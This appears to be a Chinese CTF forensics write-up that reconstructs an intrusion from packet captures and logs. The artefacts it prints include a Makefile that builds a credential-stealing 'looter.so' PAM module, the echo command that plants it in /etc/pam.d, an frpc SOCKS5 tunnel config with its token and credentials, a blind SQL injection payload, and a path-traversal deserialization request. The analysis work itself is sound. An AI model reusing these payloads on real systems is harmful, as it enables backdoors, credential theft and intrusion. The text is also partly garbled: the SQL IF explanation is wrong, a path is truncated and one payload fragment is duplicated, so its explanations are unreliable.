JWT
使用wireshark打开附件,追踪HTTP流。
分析这个JWT字段,到jwt.io下面去解出来
追踪TCP流,到第10个TCP时,我们可以发现这里实现了命令执行,输出了当前服务器的权限。
获得命令执行接口后,上传了一个c文件到tmp目录下。
上传该c文件后,使用makefile操作将这个c文件编译成恶意的so文件。
CFLAGS += -Werror -Wall
looter.so: looter.c
gcc $(CFLAGS) -fPIC -shared -Xlinker -x -o $@ $< -lcurl
在第26个数据报中可以看到修改文件内容的命令
command=echo "auth optional looter.so">>/etc/pam.d/common-aut
webshell
找到用于web应用登录的用户名和密码
查看cookie可以看到这是thinkphp的框架,这里也显示了这个web服务器的日志文件目录。
Cookie: PHPSESSID=c7rg88itbq4egddujcpt67mqh6; think_language=zh-CN; think_template=default
由于是一句话木马获取webshell,所以权限是www-data
查看攻击者使用的代理工具
将上面的字符串L3Zhci93d3cvaHRtbC9mcnBj进行base64解码,得知代理工具为frpc
同时,将后面的十六进制数值进行解码,得到以下信息。
[common]
server_addr = 192.168.239.123
server_port = 7778
token=Xa3BJf2l5enmN6Z7A8mv
[test_sock5]
type = tcp
remote_port =8111
plugin = socks5
plugin_user = 0HDFt16cLQJ
plugin_passwd = JTN276Gp
use_encryption = true
use_compression = true
sql注入
日志文件中使用了sql盲注进行数据的爆破
1 and if(substr(database(),1,1) = 'w',1,(select table_name from information_schema.tables))
if函数,如果第一个表达式的值为真,那么返回第二个表达式的值。如果为假,那么返回第二个表达式的值。
同时,我们知道,sql盲注在获得第一个字符后,就会终止爆破,去查找第二个字符。
以此类推,可以获得这里的数据库名以及其他信息。
日志分析
源码泄露
反序列化
GET /?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fsess_car&content=func%7CN%3Bfiles%7Ca%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A16%3A%22.%2Ffiles%2Ffilename%22%3Bs%3A20%3A%22call_user_func_array%22%3Bs%3A28%3A%22.%2Ffiles%2Fcall_user_func_array%22%3B%7Dpaths%7Ca%3A1%3A%7Bs%3A5%3A%22%2Fflag%22%3Bs%3A13%3A%22SplFileObject%22%3B%7D
ser_func_array%22%3B%7Dpaths%7Ca%3A1%3A%7Bs%3A5%3A%22%2Fflag%22%3Bs%3A13%3A%22SplFileObject%22%3B%7D
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
